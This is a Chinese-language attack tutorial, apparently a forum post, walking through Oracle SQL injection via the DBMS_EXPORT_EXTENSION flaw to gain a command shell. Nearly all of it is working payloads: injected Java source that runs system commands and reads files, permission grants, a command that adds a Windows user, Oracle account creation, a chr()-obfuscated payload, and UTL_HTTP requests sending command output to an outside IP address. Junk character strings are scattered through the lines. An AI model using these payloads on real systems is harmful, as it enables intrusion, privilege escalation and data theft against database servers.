实例演示oracle注入获取cmdshell的全过程

admin

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成

1 [+ R* _1 d; T. K　　/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
* d6 S$ M3 u3 O2 ?0 w2 C的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长，可能要用post提交。
/ F- l0 m4 _! Q0 ^+ ^8 P以下是各个步骤：
0 Y, j2 G$ N3 V1 G' K5 L' M) t1.创建包
9 M: l8 R. U8 V: U: K7 `通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：
4 B! _  _+ B, C, R) A# N8 y$ N4 Y/xxx.jsp?id=1 and '1'<>'a'||(
  U% O- b" X4 x/ Gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ R! b4 q$ Q4 w; E. e3 screate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
* }7 K/ y! A6 j5 g2 Wnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
" Y/ o( |  e* c" M)
( P9 v, X& k2 v/ R2 M0 s: T7 c! a------------------------
! j' u& W9 l; N- o) o% U$ f& L如果url有长度限制，可以把readFile()函数块去掉，即：
# @( C2 Z4 ]! c0 O4 Y# `6 U" J" ]# v/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
! P; l7 z- |; ?1 k0 v4 u)
7 ?) E; i8 P0 i同时把后面步骤 提到的 对readFile()的处理语句去掉。
------------------------------
0 j# o; k/ a& m2 x0 X* l2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
7 l; D/ I. g, Z  s3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
. U$ u, V9 F% F' \" e) [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
6 N+ T1 Z8 v$ r- t! w4.赋public执行函数的权限
' ~. G, Z$ X8 `, `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
0 Y( Z- Z+ b2 v$ Y  t3 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
  |1 Y( O1 k% Q  O6 ]5.测试上面的几步是否成功
and '1'<>'11'||(
6 b* S0 w- Y( i, ~4 q- tselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
# l$ Q$ U& m% y5 q( H3 oselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
! \0 b5 l  s: J, o- L6.执行命令：
: `( E+ Y% x6 n% U% e; w: u1 B8 y/xxx.jsp?id=1 and '1'<>(
3 t. H/ \/ t4 B+ a/ jselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
1 s# i  e4 {+ }
! ^4 M" ^$ Z; B4 H/ S) l) m)
/xxx.jsp?id=1 and '1'<>(
. ]1 h/ {! g& W, R2 nselect  sys.LinxReadFile('c:/boot.ini') from dual

)
9 S( N$ L* `4 w5 D2 d, v　　
. t8 j9 f: A0 V8 a  J7 x6 h注意sys.LinxReadFile()返回的是varchar类型，不能用"and 1<>" 代替 "and '1'<>"。
7 l$ h+ f5 ?/ b' R/ g' h; Q如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request(:
/ a. k: [* W( F% O0 o$ V7 b/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
. c1 ~& ]. _; f$ I)
8 |' a6 R# J  q( J/xxx.jsp?id=1 and '1'<>(
# s+ G& S3 @0 F/ q# [8 wSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
; W$ \. c7 K- M/ U)
注意：用UTL_HTTP.request时，要用 REPLACE() 把空格、换行符给替换掉，否则会无法提交http request。用utl_encode.base64_encode也可以。
, E4 B' Y9 o/ o0 Y: `--------------------
6.内部变化
% Z" E+ D- T5 x5 ^通过以下命令可以查看all_objects表达改变：
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
/ z7 L1 ?- I) `" R0 _7 H& D7.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
+ ]! s+ f' @9 Q" ~5 P( @% Olinx
124829445
2008.1.12
( `( E3 B1 J8 e8 `5 }# V5 G' f) G3 Ylinyujian@bjfu.edu.cn
3 I: k5 p7 |- d" H8 R3 o5 [======================================================================
7 b% {' T& w( _5 t7 K测试漏洞的另一方法：
创建oracle帐号：
, I7 N0 h4 p* oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" W" |& m9 J- WCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
' c3 {7 K  t+ S, q即：
& h4 c! k. r8 e7 z9 k0 Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
+ q* [2 M' r5 ~chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
8 ?" Q4 j  `+ [确定漏洞存在：
. O% P3 o) K. b# T1<>(
select user_id from all_users where username='LINXSQL'
5 N8 ^& f' `# r7 C* L' y2 C7 }" u)
给linxsql连接权限：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- k" j+ G' c5 {: lGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
! R7 ?: i7 p( F3 J( c4 r6 `删除帐号：
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) O$ K) @5 t) T# Ddrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query()，执行成功的话返回数值"1"，但权限是继承的，可能仅仅是public权限，作用似乎不大，真的要用到话可以考虑grant dba to 当前的User：
7 R# _+ u9 d- ^& O1.jsp?id=1 and '1'<>(
; O9 u9 J, j! c1 y- Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
1 Q- [: i3 ~6 m/ Z3 |( c) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
5 L2 Y5 U7 N) E　)